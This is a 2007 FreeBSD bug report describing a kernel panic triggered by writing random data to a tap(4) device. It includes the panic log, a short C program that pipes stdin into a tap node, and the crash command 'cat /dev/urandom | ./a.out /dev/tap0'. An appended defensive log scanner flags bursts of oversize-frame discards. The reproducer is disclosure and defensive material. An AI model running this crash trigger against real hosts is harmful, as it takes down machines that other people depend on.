From owner-freebsd-bugs@FreeBSD.ORG Mon Dec 3 15:10:04 2007
Date: Mon, 3 Dec 2007 15:08:13 GMT
From: Gabor Berczi
To: freebsd-gnats-submit@FreeBSD.org
Subject: misc/118399: local/remote kernel DoS through TAP device
Message-Id: <200712031508.lB3F8DVQ080758@www.freebsd.org>
Resent-Date: Mon, 3 Dec 2007 15:10:04 GMT
Resent-Message-Id: <200712031510.lB3FA4Tg071116@freefall.freebsd.org>
Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer)
Resent-To: freebsd-bugs@FreeBSD.org
X-Send-Pr-Version: www-3.1

>Number:         118399
>Category:       misc
>Synopsis:       local/remote kernel DoS through TAP device
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 03 15:10:04 UTC 2007
>Closed-Date:
>Last-Modified:
>Originator:     Gabor Berczi
>Release:        6.2-RELEASE
>Organization:
>Environment:
Tested on x86/alpha, SMP/non-SMP.
>Description:
There is a bug somewhere in the FreeBSD kernel that causes a lockup if the TAP device receives abnormal data.

..
tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)

fatal kernel trap:

    trap entry = 0x2 (memory management fault)
    cpuid      = 0
    faulting va = 0x34
    type       = access violation
    cause      = load instructon
    pc         = 0xfffffc00005dd39c
    ra         = 0xfffffc00005de15c
    sp         = 0xfffffe0007763870
    usp        = 0x11ffd6c0
    curthread  = 0xfffffc0001ef22b0
        pid = 31183, comm = zsh

panic: trap

>How-To-Repeat:
1. Compile this:

    /* Headers for open(2), read(2)/write(2)/close(2) and perror(3); the
     * header names were lost in the archived copy and are restored here. */
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <stdio.h>

    /* Copy standard input, in chunks of up to 2048 bytes, into the device
     * named on the command line (here a tap(4) node). */
    int main(int argc, char **argv)
    {
        if (argc != 2)
            return 1;

        int fd = open(argv[1], O_WRONLY);
        if (fd < 0) {
            perror("open");
            return 1;
        }

        for (;;) {
            char buf[2048];
            int ret = read(0, buf, sizeof(buf));
            if (ret < 0) {
                perror("read");
                close(fd);
                return 1;
            }
            if (ret == 0)           /* end of input: stop instead of spinning */
                break;
            if (write(fd, buf, ret) < 0) {
                perror("write");
                close(fd);
                return 1;
            }
        }

        close(fd);
        return 0;
    }

2. Load if_tap, and create the tap0 device.
3. cat /dev/urandom | ./a.out /dev/tap0

Sooner or later it'll die.
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
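The report shows a burst of "discard oversize frame" messages from tap(4) immediately before the panic, so those messages are a usable early-warning signal on a host where an untrusted process can write to a tap node. The following is an added example, not code from this PR or from FreeBSD: a small C scanner that parses kernel log lines in the format shown above, counts discards per interface, records the largest frame length seen, and flags a burst. The sample log is constructed from the lines in the report (with one unrelated line and one extra interface added), and the burst threshold is an assumption chosen for the example.

```c
/* Added example (not part of PR 118399): detect bursts of tap(4)
 * "discard oversize frame" messages in kernel log text. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define MAX_IFS 8

struct if_count {
    char name[16];
    int discards;      /* oversize-frame discards seen on this interface */
    int worst_len;     /* largest frame length reported */
};

struct tap_stats {
    struct if_count ifs[MAX_IFS];
    int nifs;
};

/* Parse one log line of the form
 *   "tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)"
 * (format taken from the report). Returns 1 and fills the fields if the line
 * matches, 0 otherwise. */
static int parse_discard_line(const char *line, char *ifname, size_t ifsz,
                              unsigned *etype, unsigned *flags, int *len, int *max)
{
    char name[32];
    int n = sscanf(line,
                   "%31[^:]: discard oversize frame (ether type %x flags %x len %d > max %d)",
                   name, etype, flags, len, max);
    if (n != 5)
        return 0;
    snprintf(ifname, ifsz, "%s", name);
    return 1;
}

/* Find or create the per-interface counter; NULL if the table is full. */
static struct if_count *lookup(struct tap_stats *st, const char *ifname)
{
    for (int i = 0; i < st->nifs; i++)
        if (strcmp(st->ifs[i].name, ifname) == 0)
            return &st->ifs[i];
    if (st->nifs == MAX_IFS)
        return NULL;
    struct if_count *c = &st->ifs[st->nifs++];
    snprintf(c->name, sizeof c->name, "%s", ifname);
    c->discards = 0;
    c->worst_len = 0;
    return c;
}

/* Scan newline-separated log text; returns the number of discard messages. */
int scan_log(struct tap_stats *st, const char *log)
{
    int total = 0;
    const char *p = log;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (n >= sizeof line)
            n = sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';

        char ifname[16];
        unsigned et, fl;
        int len, max;
        if (parse_discard_line(line, ifname, sizeof ifname, &et, &fl, &len, &max)) {
            struct if_count *c = lookup(st, ifname);
            if (c) {
                c->discards++;
                if (len > c->worst_len)
                    c->worst_len = len;
            }
            total++;
        }
        p = nl ? nl + 1 : p + n;
    }
    return total;
}

/* 1 if any interface reached `threshold` discards (a burst like the one in
 * the report), else 0. The threshold value is the caller's choice. */
int burst_detected(const struct tap_stats *st, int threshold)
{
    for (int i = 0; i < st->nifs; i++)
        if (st->ifs[i].discards >= threshold)
            return 1;
    return 0;
}

/* Constructed sample, modelled on the dmesg lines in the report. */
static const char *sample_log =
    "tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)\n"
    "tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)\n"
    "em0: link state changed to UP\n"
    "tap0: discard oversize frame (ether type 39e7 flags 3 len 4096 > max 1514)\n"
    "tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514)\n";

int main(void)
{
    struct tap_stats st = {0};
    int n = scan_log(&st, sample_log);
    printf("%d oversize-frame discards\n", n);
    for (int i = 0; i < st.nifs; i++)
        printf("%s: %d discards, largest len %d\n",
               st.ifs[i].name, st.ifs[i].discards, st.ifs[i].worst_len);
    if (burst_detected(&st, 3))
        printf("burst on a tap interface: check which process holds the tap node open\n");
    return 0;
}
```

On a real host the text would come from `dmesg` or `/var/log/messages`; the reasonable operational response to a burst is to identify the process holding the tap node open (for example with `fstat`) and to restrict write access to `/dev/tap*` to the daemon that legitimately needs it.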